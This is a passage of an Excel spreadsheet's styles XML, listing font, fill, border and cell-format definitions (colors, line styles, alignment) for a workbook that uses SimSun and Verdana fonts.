      <charset val="134"/>
    </font>
    <font>
      <sz val="7"/>
      <color theme="1"/>
      <name val="宋体"/>
      <family val="3"/>
      <charset val="134"/>
    </font>
    <font>
      <sz val="11"/>
      <color rgb="FF333333"/>
      <name val="Verdana"/>
      <family val="2"/>
    </font>
    <font>
      <sz val="11"/>
      <color rgb="FF333333"/>
      <name val="宋体"/>
      <family val="3"/>
      <charset val="134"/>
    </font>
    <font>
      <b/>
      <sz val="11"/>
      <color rgb="FF333333"/>
      <name val="宋体"/>
      <family val="3"/>
      <charset val="134"/>
    </font>
    <font>
      <b/>
      <sz val="11"/>
      <color rgb="FF333333"/>
      <name val="Verdana"/>
      <family val="2"/>
    </font>
  </fonts>
  <fills count="13">
    <fill>
      <patternFill patternType="none"/>
    </fill>
    <fill>
      <patternFill patternType="gray125"/>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor theme="0" tint="-0.249977111117893"/>
        <bgColor indexed="64"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor theme="2" tint="-9.9978637043366805E-2"/>
        <bgColor indexed="64"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="gray0625">
        <fgColor rgb="FFFF0000"/>
        <bgColor theme="3"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor rgb="FFFFFF00"/>
        <bgColor indexed="64"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor rgb="FFFFFCF7"/>
        <bgColor indexed="64"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor rgb="FFFBDEB7"/>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3" tint="0.59999389629810485"/>
        <bgColor indexed="64"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="gray0625"/>
    </fill>
  </fills>
  <borders count="118">
    <border>
      <left/>
      <right/>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rgb="FFDBB98B"/>
      </bottom>
      <diagonal/>
    </border>
    <border>
      <left/>
      <right/>
      <top style="medium">
        <color rgb="FF92683D"/>
      </top>
      <bottom style="medium">
        <color rgb="FF92683D"/>
      </bottom>
      <diagonal/>
    </border>
    <border>
      <left/>
      <right/>
      <top/>
      <bottom style="mediumDashed">
        <color rgb="FFE5C395"/>
      </bottom>
      <diagonal/>
    </border>
    <border>
      <left/>
      <right/>
      <top/>
      <bottom style="mediumDashed">
        <color rgb="FFDAB77D"/>
      </bottom>
      <diagonal/>
    </border>
    <border>
      <left/>
      <right/>
      <top style="mediumDashed">
        <color rgb="FFE5C395"/>
      </top>
      <bottom/>
      <diagonal/>
    </border>
    <border>
      <left/>
      <right/>
      <top style="mediumDashed">
        <color rgb="FFDAB77D"/>
      </top>
      <bottom/>
      <diagonal/>
    </border>
    <border>
      <left style="medium">
        <color rgb="FFD0AD73"/>
      </left>
      <right/>
      <top style="medium">
        <color rgb="FFD0AD73"/>
      </top>
      <bottom/>
      <diagonal/>
    </border>
    <border>
      <left/>
      <right/>
      <top style="medium">
        <color rgb="FFD0AD73"/>
      </top>
      <bottom/>
      <diagonal/>
    </border>
    <border>
      <left/>
      <right style="medium">
        <color rgb="FFD0AD73"/>
      </right>
      <top style="medium">
        <color rgb="FFD0AD73"/>
      </top>
      <bottom/>
      <diagonal/>
    </border>
    <border>
      <left style="medium">
        <color rgb="FFD0AD73"/>
      </left>
      <right/>
      <top/>
      <bottom style="medium">
        <color rgb="FFDBB98B"/>
      </bottom>
      <diagonal/>
    </border>
    <border>
      <left/>
      <right style="medium">
        <color rgb="FFD0AD73"/>
      </right>
      <top/>
      <bottom style="medium">
        <color rgb="FFDBB98B"/>
      </bottom>
      <diagonal/>
    </border>
    <border>
      <left style="medium">
        <color rgb="FFD0AD73"/>
      </left>
      <right/>
      <top/>
      <bottom/>
      <diagonal/>
    </border>
    <border>
      <left/>
      <right style="medium">
        <color rgb="FFD0AD73"/>
      </right>
      <top/>
      <bottom/>
      <diagonal/>
    </border>
    <border>
      <left style="medium">
        <color rgb="FFD0AD73"/>
      </left>
      <right/>
      <top style="medium">
        <color rgb="FF92683D"/>
      </top>
      <bottom style="medium">
        <color rgb="FF92683D"/>
      </bottom>
      <diagonal/>
    </border>
    <border>
      <left/>
      <right style="medium">
        <color rgb="FFD0AD73"/>
      </right>
      <top style="medium">
        <color rgb="FF92683D"/>
      </top>
      <bottom style="medium">
        <color rgb="FF92683D"/>
      </bottom>
      <diagonal/>
    </border>
    <border>
      <left style="medium">
        <color rgb="FFD0AD73"/>
      </left>
      <right/>
      <top style="medium">
        <color rgb="FF92683D"/>
      </top>
      <bottom/>
      <diagonal/>
    </border>
    <border>
      <left/>
      <right style="medium">
        <color rgb="FFD0AD73"/>
      </right>
      <top/>
      <bottom style="mediumDashed">
        <color rgb="FFDAB77D"/>
      </bottom>
      <diagonal/>
    </border>
    <border>
      <left style="medium">
        <color rgb="FFD0AD73"/>
      </left>
      <right/>
      <top/>
      <bottom style="mediumDashed">
        <color rgb="FFE5C395"/>
      </bottom>
      <diagonal/>
    </border>
    <border>
      <left style="medium">
        <color rgb="FFD0AD73"/>
      </left>
      <right/>
      <top style="mediumDashed">
        <color rgb="FFE5C395"/>
      </top>
      <bottom/>
      <diagonal/>
    </border>
    <border>
      <left style="medium">
        <color rgb="FFD0AD73"/>
      </left>
      <right/>
      <top/>
      <bottom style="medium">
        <color rgb="FFD0AD73"/>
      </bottom>
      <diagonal/>
    </border>
    <border>
      <left/>
      <right/>
      <top/>
      <bottom style="medium">
        <color rgb="FFD0AD73"/>
      </bottom>
      <diagonal/>
    </border>
    <border>
      <left/>
      <right style="medium">
        <color rgb="FFD0AD73"/>
      </right>
      <top/>
      <bottom style="medium">
        <color rgb="FFD0AD73"/>
      </bottom>
      <diagonal/>
    </border>
    <border>
      <left style="medium">
        <color rgb="FFD0AD73"/>
      </left>
      <right/>
      <top style="medium">
        <color rgb="FFDBB98B"/>
      </top>
      <bottom/>
      <diagonal/>
    </border>
    <border>
      <left/>
      <right/>
      <top style="medium">
        <color rgb="FFDBB98B"/>
      </top>
      <bottom/>
      <diagonal/>
    </border>
    <border>
      <left/>
      <right style="medium">
        <color rgb="FFD0AD73"/>
      </right>
      <top style="medium">
        <color rgb="FFDBB98B"/>
      </top>
      <bottom/>
      <diagonal/>
    </border>
    <border>
      <left style="medium">
        <color rgb="FFD0AD73"/>
      </left>
      <right/>
      <top/>
      <bottom style="medium">
        <color rgb="FF92683D"/>
      </bottom>
      <diagonal/>
    </border>
    <border>
      <left/>
      <right/>
      <top/>
      <bottom style="medium">
        <color rgb="FF92683D"/>
      </bottom>
      <diagonal/>
    </border>
    <border>
      <left/>
      <right style="medium">
        <color rgb="FFD0AD73"/>
      </right>
      <top/>
      <bottom style="medium">
        <color rgb="FF92683D"/>
      </bottom>
      <diagonal/>
    </border>
    <border>
      <left/>
      <right/>
      <top style="medium">
        <color theme="3" tint="0.79998168889431442"/>
      </top>
      <bottom style="medium">
        <color theme="3" tint="0.79998168889431442"/>
      </bottom>
      <diagonal/>
    </border>
    <border>
      <left style="medium">
        <color rgb="FFD0AD73"/>
      </left>
      <right style="medium">
        <color rgb="FFD0AD73"/>
      </right>
      <top style="medium">
        <color rgb="FF92683D"/>
      </top>
      <bottom style="medium">
        <color rgb="FFD0AD73"/>
      </bottom>
      <diagonal/>
    </border>
    <border>
      <left style="medium">
        <color rgb="FFD0AD73"/>
      </left>
      <right style="medium">
        <color rgb="FFD0AD73"/>
      </right>
      <top style="medium">
        <color rgb="FFD0AD73"/>
      </top>
      <bottom style="medium">
        <color rgb="FFD0AD73"/>
      </bottom>
      <diagonal/>
    </border>
    <border>
      <left style="medium">
        <color rgb="FFD0AD73"/>
      </left>
      <right style="medium">
        <color rgb="FFD0AD73"/>
      </right>
      <top style="medium">
        <color rgb="FFD0AD73"/>
      </top>
      <bottom style="mediumDashed">
        <color rgb="FFE5C395"/>
      </bottom>
      <diagonal/>
    </border>
    <border>
      <left style="medium">
        <color rgb="FFD0AD73"/>
      </left>
      <right style="medium">
        <color rgb="FFD0AD73"/>
      </right>
      <top style="medium">
        <color rgb="FF92683D"/>
      </top>
      <bottom/>
      <diagonal/>
    </border>
    <border>
      <left style="medium">
        <color rgb="FFD0AD73"/>
      </left>
      <right style="medium">
        <color rgb="FFD0AD73"/>
      </right>
      <top/>
      <bottom/>
      <diagonal/>
    </border>
    <border>
      <left style="medium">
        <color rgb="FFD0AD73"/>
      </left>
      <right style="medium">
        <color rgb="FFD0AD73"/>
      </right>
      <top/>
      <bottom style="mediumDashed">
        <color rgb="FFE5C395"/>
      </bottom>
      <diagonal/>
    </border>
    <border>
      <left style="dashed">
        <color theme="3" tint="0.79998168889431442"/>
      </left>
      <right/>
      <top style="medium">
        <color theme="3" tint="0.79998168889431442"/>
      </top>
      <bottom style="medium">
        <color theme="3" tint="0.79998168889431442"/>
      </bottom>
      <diagonal/>
    </border>
    <border>
      <left style="thin">
        <color theme="3" tint="0.39994506668294322"/>
      </left>
      <right style="thin">
        <color theme="3" tint="0.39994506668294322"/>
      </right>
      <top style="thin">
        <color theme="3" tint="0.39994506668294322"/>
      </top>
      <bottom style="thin">
        <color theme="3" tint="0.39994506668294322"/>
      </bottom>
      <diagonal/>
    </border>
    <border>
      <left style="medium">
        <color theme="3" tint="0.79998168889431442"/>
      </left>
      <right style="medium">
        <color theme="3" tint="0.79998168889431442"/>
      </right>
      <top style="medium">
        <color theme="3" tint="0.79998168889431442"/>
      </top>
      <bottom style="medium">
        <color theme="3" tint="0.79998168889431442"/>
      </bottom>
      <diagonal/>
    </border>
    <border>
      <left/>
      <right/>
      <top style="medium">
        <color theme="3" tint="0.59996337778862885"/>
      </top>
      <bottom style="medium">
        <color theme="3" tint="0.59996337778862885"/>
      </bottom>
      <diagonal/>
    </border>
    <border>
      <left style="medium">
        <color theme="3" tint="0.79998168889431442"/>
      </left>
      <right/>
      <top style="medium">
        <color theme="3" tint="0.79998168889431442"/>
      </top>
      <bottom style="medium">
        <color theme="3" tint="0.79998168889431442"/>
      </bottom>
      <diagonal/>
    </border>
    <border>
      <left/>
      <right style="medium">
        <color theme="3" tint="0.79998168889431442"/>
      </right>
      <top style="medium">
        <color theme="3" tint="0.79998168889431442"/>
      </top>
      <bottom style="medium">
        <color theme="3" tint="0.79998168889431442"/>
      </bottom>
      <diagonal/>
    </border>
    <border>
      <left style="thin">
        <color theme="3" tint="0.39997558519241921"/>
      </left>
      <right style="thin">
        <color theme="3" tint="0.39997558519241921"/>
      </right>
      <top style="thin">
        <color theme="3" tint="0.39997558519241921"/>
      </top>
      <bottom style="thin">
        <color theme="3" tint="0.39997558519241921"/>
      </bottom>
      <diagonal/>
    </border>
    <border>
      <left style="medium">
        <color theme="3" tint="0.79995117038483843"/>
      </left>
      <right/>
      <top style="medium">
        <color theme="3" tint="0.79995117038483843"/>
      </top>
      <bottom style="medium">
        <color theme="3" tint="0.79998168889431442"/>
      </bottom>
      <diagonal/>
    </border>
    <border>
      <left/>
      <right/>
      <top style="medium">
        <color theme="3" tint="0.79998168889431442"/>
      </top>
      <bottom/>
      <diagonal/>
    </border>
    <border>
      <left style="medium">
        <color theme="3" tint="0.79995117038483843"/>
      </left>
      <right/>
      <top style="medium">
        <color theme="3" tint="0.79998168889431442"/>
      </top>
      <bottom style="medium">
        <color theme="3" tint="0.79998168889431442"/>
      </bottom>
      <diagonal/>
    </border>
    <border>
      <left style="medium">
        <color theme="3" tint="0.59996337778862885"/>
      </left>
      <right/>
      <top style="medium">
        <color theme="3" tint="0.59996337778862885"/>
      </top>
      <bottom style="medium">
        <color theme="3" tint="0.59996337778862885"/>
      </bottom>
      <diagonal/>
    </border>
    <border>
      <left/>
      <right style="medium">
        <color theme="3" tint="0.79998168889431442"/>
      </right>
      <top/>
      <bottom/>
      <diagonal/>
    </border>
    <border>
      <left/>
      <right/>
      <top/>
      <bottom style="medium">
        <color theme="3" tint="0.79998168889431442"/>
      </bottom>
      <diagonal/>
    </border>
    <border>
      <left style="thin">
        <color auto="1"/>
      </left>
      <right style="dotted">
        <color auto="1"/>
      </right>
      <top style="thin">
        <color auto="1"/>
      </top>
      <bottom style="dotted">
        <color auto="1"/>
      </bottom>
      <diagonal/>
    </border>
    <border>
      <left style="dotted">
        <color auto="1"/>
      </left>
      <right style="dotted">
        <color auto="1"/>
      </right>
      <top style="thin">
        <color auto="1"/>
      </top>
      <bottom style="dotted">
        <color auto="1"/>
      </bottom>
      <diagonal/>
    </border>
    <border>
      <left style="dotted">
        <color auto="1"/>
      </left>
      <right style="thin">
        <color auto="1"/>
      </right>
      <top style="thin">
        <color auto="1"/>
      </top>
      <bottom style="dotted">
        <color auto="1"/>
      </bottom>
      <diagonal/>
    </border>
    <border>
      <left style="thin">
        <color auto="1"/>
      </left>
      <right style="dotted">
        <color auto="1"/>
      </right>
      <top style="dotted">
        <color auto="1"/>
      </top>
      <bottom style="dotted">
        <color auto="1"/>
      </bottom>
      <diagonal/>
    </border>
    <border>
      <left style="dotted">
        <color auto="1"/>
      </left>
      <right style="dotted">
        <color auto="1"/>
      </right>
      <top style="dotted">
        <color auto="1"/>
      </top>
      <bottom style="dotted">
        <color auto="1"/>
      </bottom>
      <diagonal/>
    </border>
    <border>
      <left style="dotted">
        <color auto="1"/>
      </left>
      <right style="thin">
        <color auto="1"/>
      </right>
      <top style="dotted">
        <color auto="1"/>
      </top>
      <bottom style="dotted">
        <color auto="1"/>
      </bottom>
      <diagonal/>
    </border>
    <border>
      <left style="thin">
        <color auto="1"/>
      </left>
      <right style="dotted">
        <color auto="1"/>
      </right>
      <top style="dotted">
        <color auto="1"/>
      </top>
      <bottom style="thin">
        <color auto="1"/>
      </bottom>
      <diagonal/>
    </border>
    <border>
      <left style="dotted">
        <color auto="1"/>
      </left>
      <right style="dotted">
        <color auto="1"/>
      </right>
      <top style="dotted">
        <color auto="1"/>
      </top>
      <bottom style="thin">
        <color auto="1"/>
      </bottom>
      <diagonal/>
    </border>
    <border>
      <left style="dotted">
        <color auto="1"/>
      </left>
      <right style="thin">
        <color auto="1"/>
      </right>
      <top style="dotted">
        <color auto="1"/>
      </top>
      <bottom style="thin">
        <color auto="1"/>
      </bottom>
      <diagonal/>
    </border>
    <border>
      <left style="medium">
        <color indexed="64"/>
      </left>
      <right/>
      <top style="double">
        <color indexed="64"/>
      </top>
      <bottom/>
      <diagonal/>
    </border>
    <border>
      <left style="medium">
        <color indexed="64"/>
      </left>
      <right/>
      <top/>
      <bottom/>
      <diagonal/>
    </border>
    <border>
      <left style="medium">
        <color indexed="64"/>
      </left>
      <right style="double">
        <color indexed="64"/>
      </right>
      <top style="medium">
        <color indexed="64"/>
      </top>
      <bottom style="double">
        <color indexed="64"/>
      </bottom>
      <diagonal/>
    </border>
    <border>
      <left style="double">
        <color indexed="64"/>
      </left>
      <right style="medium">
        <color indexed="64"/>
      </right>
      <top style="double">
        <color indexed="64"/>
      </top>
      <bottom/>
      <diagonal/>
    </border>
    <border>
      <left style="double">
        <color indexed="64"/>
      </left>
      <right style="medium">
        <color indexed="64"/>
      </right>
      <top/>
      <bottom/>
      <diagonal/>
    </border>
    <border>
      <left style="medium">
        <color auto="1"/>
      </left>
      <right style="medium">
        <color auto="1"/>
      </right>
      <top style="medium">
        <color auto="1"/>
      </top>
      <bottom style="medium">
        <color auto="1"/>
      </bottom>
      <diagonal/>
    </border>
    <border>
      <left style="double">
        <color auto="1"/>
      </left>
      <right style="medium">
        <color auto="1"/>
      </right>
      <top style="medium">
        <color auto="1"/>
      </top>
      <bottom style="double">
        <color auto="1"/>
      </bottom>
      <diagonal/>
    </border>
    <border>
      <left style="medium">
        <color auto="1"/>
      </left>
      <right style="medium">
        <color auto="1"/>
      </right>
      <top style="medium">
        <color auto="1"/>
      </top>
      <bottom style="double">
        <color auto="1"/>
      </bottom>
      <diagonal/>
    </border>
    <border>
      <left style="medium">
        <color indexed="64"/>
      </left>
      <right style="double">
        <color indexed="64"/>
      </right>
      <top/>
      <bottom/>
      <diagonal/>
    </border>
    <border>
      <left/>
      <right/>
      <top style="double">
        <color auto="1"/>
      </top>
      <bottom style="double">
        <color indexed="64"/>
      </bottom>
      <diagonal/>
    </border>
    <border>
      <left style="medium">
        <color indexed="64"/>
      </left>
      <right style="double">
        <color indexed="64"/>
      </right>
      <top style="double">
        <color indexed="64"/>
      </top>
      <bottom/>
      <diagonal/>
    </border>
    <border>
      <left/>
      <right style="medium">
        <color indexed="64"/>
      </right>
      <top style="double">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style="medium">
        <color indexed="64"/>
      </right>
      <top/>
      <bottom/>
      <diagonal/>
    </border>
    <border>
      <left style="double">
        <color auto="1"/>
      </left>
      <right style="medium">
        <color auto="1"/>
      </right>
      <top/>
      <bottom style="medium">
        <color auto="1"/>
      </bottom>
      <diagonal/>
    </border>
    <border>
      <left style="medium">
        <color auto="1"/>
      </left>
      <right style="medium">
        <color auto="1"/>
      </right>
      <top/>
      <bottom style="medium">
        <color auto="1"/>
      </bottom>
      <diagonal/>
    </border>
    <border>
      <left style="medium">
        <color indexed="64"/>
      </left>
      <right style="double">
        <color indexed="64"/>
      </right>
      <top/>
      <bottom style="medium">
        <color indexed="64"/>
      </bottom>
      <diagonal/>
    </border>
    <border>
      <left/>
      <right/>
      <top/>
      <bottom style="medium">
        <color theme="3" tint="0.39994506668294322"/>
      </bottom>
      <diagonal/>
    </border>
    <border>
      <left/>
      <right/>
      <top style="medium">
        <color theme="3" tint="0.39994506668294322"/>
      </top>
      <bottom style="medium">
        <color theme="3" tint="0.39994506668294322"/>
      </bottom>
      <diagonal/>
    </border>
    <border>
      <left/>
      <right/>
      <top style="medium">
        <color theme="3" tint="0.39994506668294322"/>
      </top>
      <bottom style="medium">
        <color theme="3" tint="0.39991454817346722"/>
      </bottom>
      <diagonal/>
    </border>
    <border>
      <left style="dashed">
        <color theme="3" tint="0.59996337778862885"/>
      </left>
      <right style="dashed">
        <color theme="3" tint="0.59996337778862885"/>
      </right>
      <top style="medium">
        <color theme="3" tint="0.59996337778862885"/>
      </top>
      <bottom style="medium">
        <color theme="3" tint="0.59996337778862885"/>
      </bottom>
      <diagonal/>
    </border>
    <border>
      <left style="medium">
        <color rgb="FF888888"/>
      </left>
      <right style="medium">
        <color rgb="FF888888"/>
      </right>
      <top style="medium">
        <color rgb="FF888888"/>
      </top>
      <bottom style="medium">
        <color rgb="FF888888"/>
      </bottom>
      <diagonal/>
    </border>
    <border>
      <left/>
      <right/>
      <top/>
      <bottom style="medium">
        <color theme="3" tint="0.59996337778862885"/>
      </bottom>
      <diagonal/>
    </border>
    <border>
      <left/>
      <right style="hair">
        <color theme="3" tint="0.39994506668294322"/>
      </right>
      <top style="medium">
        <color theme="3" tint="0.59996337778862885"/>
      </top>
      <bottom style="medium">
        <color theme="3" tint="0.39994506668294322"/>
      </bottom>
      <diagonal/>
    </border>
    <border>
      <left style="hair">
        <color theme="3" tint="0.39994506668294322"/>
      </left>
      <right/>
      <top/>
      <bottom style="medium">
        <color theme="3" tint="0.39994506668294322"/>
      </bottom>
      <diagonal/>
    </border>
    <border>
      <left/>
      <right style="hair">
        <color theme="3" tint="0.39994506668294322"/>
      </right>
      <top style="medium">
        <color theme="3" tint="0.39994506668294322"/>
      </top>
      <bottom style="medium">
        <color theme="3" tint="0.39994506668294322"/>
      </bottom>
      <diagonal/>
    </border>
    <border>
      <left style="hair">
        <color theme="3" tint="0.39994506668294322"/>
      </left>
      <right/>
      <top style="medium">
        <color theme="3" tint="0.39994506668294322"/>
      </top>
      <bottom style="medium">
        <color theme="3" tint="0.39994506668294322"/>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theme="3" tint="0.79995117038483843"/>
      </left>
      <right/>
      <top/>
      <bottom style="medium">
        <color theme="3" tint="0.79998168889431442"/>
      </bottom>
      <diagonal/>
    </border>
    <border>
      <left/>
      <right style="dotted">
        <color theme="3" tint="0.59996337778862885"/>
      </right>
      <top style="medium">
        <color theme="3" tint="0.59996337778862885"/>
      </top>
      <bottom style="medium">
        <color theme="3" tint="0.59996337778862885"/>
      </bottom>
      <diagonal/>
    </border>
    <border>
      <left style="dotted">
        <color theme="3" tint="0.59996337778862885"/>
      </left>
      <right style="dotted">
        <color theme="3" tint="0.59996337778862885"/>
      </right>
      <top style="medium">
        <color theme="3" tint="0.59996337778862885"/>
      </top>
      <bottom style="medium">
        <color theme="3" tint="0.59996337778862885"/>
      </bottom>
      <diagonal/>
    </border>
    <border>
      <left style="dotted">
        <color theme="3" tint="0.59996337778862885"/>
      </left>
      <right/>
      <top style="medium">
        <color theme="3" tint="0.59996337778862885"/>
      </top>
      <bottom style="medium">
        <color theme="3" tint="0.59996337778862885"/>
      </bottom>
      <diagonal/>
    </border>
    <border>
      <left/>
      <right/>
      <top style="medium">
        <color theme="3" tint="0.59996337778862885"/>
      </top>
      <bottom/>
      <diagonal/>
    </border>
    <border>
      <left/>
      <right style="mediumDashDotDot">
        <color theme="3" tint="0.79995117038483843"/>
      </right>
      <top style="medium">
        <color theme="3" tint="0.79998168889431442"/>
      </top>
      <bottom/>
      <diagonal/>
    </border>
    <border>
      <left style="mediumDashDotDot">
        <color theme="3" tint="0.79995117038483843"/>
      </left>
      <right style="mediumDashDotDot">
        <color theme="3" tint="0.79995117038483843"/>
      </right>
      <top style="medium">
        <color theme="3" tint="0.79998168889431442"/>
      </top>
      <bottom style="medium">
        <color theme="3" tint="0.79998168889431442"/>
      </bottom>
      <diagonal/>
    </border>
    <border>
      <left style="mediumDashDotDot">
        <color theme="3" tint="0.79995117038483843"/>
      </left>
      <right/>
      <top style="medium">
        <color theme="3" tint="0.79998168889431442"/>
      </top>
      <bottom style="medium">
        <color theme="3" tint="0.79998168889431442"/>
      </bottom>
      <diagonal/>
    </border>
    <border>
      <left/>
      <right style="mediumDashDotDot">
        <color theme="3" tint="0.79995117038483843"/>
      </right>
      <top/>
      <bottom/>
      <diagonal/>
    </border>
    <border>
      <left/>
      <right style="mediumDashDotDot">
        <color theme="3" tint="0.79995117038483843"/>
      </right>
      <top style="medium">
        <color theme="3" tint="0.79998168889431442"/>
      </top>
      <bottom style="medium">
        <color theme="3" tint="0.79998168889431442"/>
      </bottom>
      <diagonal/>
    </border>
    <border>
      <left style="double">
        <color auto="1"/>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indexed="64"/>
      </right>
      <top style="double">
        <color auto="1"/>
      </top>
      <bottom style="thin">
        <color auto="1"/>
      </bottom>
      <diagonal/>
    </border>
    <border>
      <left style="double">
        <color auto="1"/>
      </left>
      <right style="thin">
        <color auto="1"/>
      </right>
      <top style="thin">
        <color auto="1"/>
      </top>
      <bottom style="double">
        <color indexed="64"/>
      </bottom>
      <diagonal/>
    </border>
    <border>
      <left style="thin">
        <color auto="1"/>
      </left>
      <right style="thin">
        <color auto="1"/>
      </right>
      <top style="thin">
        <color auto="1"/>
      </top>
      <bottom style="double">
        <color indexed="64"/>
      </bottom>
      <diagonal/>
    </border>
    <border>
      <left style="thin">
        <color auto="1"/>
      </left>
      <right style="double">
        <color indexed="64"/>
      </right>
      <top style="thin">
        <color auto="1"/>
      </top>
      <bottom style="double">
        <color indexed="64"/>
      </bottom>
      <diagonal/>
    </border>
    <border>
      <left style="double">
        <color auto="1"/>
      </left>
      <right style="thin">
        <color auto="1"/>
      </right>
      <top style="thin">
        <color auto="1"/>
      </top>
      <bottom style="thin">
        <color auto="1"/>
      </bottom>
      <diagonal/>
    </border>
    <border>
      <left style="thin">
        <color auto="1"/>
      </left>
      <right style="double">
        <color indexed="64"/>
      </right>
      <top style="thin">
        <color auto="1"/>
      </top>
      <bottom style="thin">
        <color auto="1"/>
      </bottom>
      <diagonal/>
    </border>
  </borders>
  <cellStyleXfs count="4">
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="3" fillId="0" borderId="0" applyNumberFormat="0" applyFill="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="top"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="0" fontId="2" fillId="0" borderId="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="4" fillId="0" borderId="0">
      <alignment vertical="center"/>
    </xf>
  </cellStyleXfs>
  <cellXfs count="583">
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="3" fillId="0" borderId="0" xfId="1" applyAlignment="1" applyProtection="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="3" fillId="0" borderId="0" xfId="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="right" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="2" fillId="0" borderId="0" xfId="2" applyFont="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="2" fillId="0" borderId="0" xfId="2" applyFont="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="5" fillId="0" borderId="0" xfId="3" applyFont="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="2" fillId="0" borderId="0" xfId="2" applyFont="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="2" fillId="0" borderId="0" xfId="2">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="2" fillId="0" borderId="0" xfId="2" applyAlignment="1">
      <alignment horizontal="left" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="4" fillId="0" borderId="0" xfId="2" applyFont="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="9" fillId="0" borderId="0" xfId="1" applyFont="1" applyAlignment="1" applyProtection="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="3" fillId="0" borderId="0" xfId="1" applyAlignment="1" applyProtection="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0" applyFill="1" applyAlignment="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0" applyFill="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0" applyFill="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="10" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="11" fillId="0" borderId="0" xfId="0" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="11" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="11" fillId="0" borderId="0" xfId="2" applyFont="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="12" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="9" fillId="0" borderId="0" xfId="1" applyFont="1" applyAlignment="1" applyProtection="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="13" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0" applyFont="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="9" fillId="0" borderId="0" xfId="1" applyFont="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="right" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="15" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="4" fillId="0" borderId="0" xfId="3">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="4" fillId="0" borderId="0" xfId="3" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="17" fillId="0" borderId="0" xfId="3" applyFont="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="4" fillId="0" borderId="1" xfId="3" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="4" fillId="0" borderId="1" xfId="3" applyBorder="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="17" fillId="0" borderId="1" xfId="3" applyFont="1" applyFill="1" applyBorder="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="4" fillId="0" borderId="2" xfId="3" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="4" fillId="0" borderId="2" xfId="3" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center"/>
    </xf>
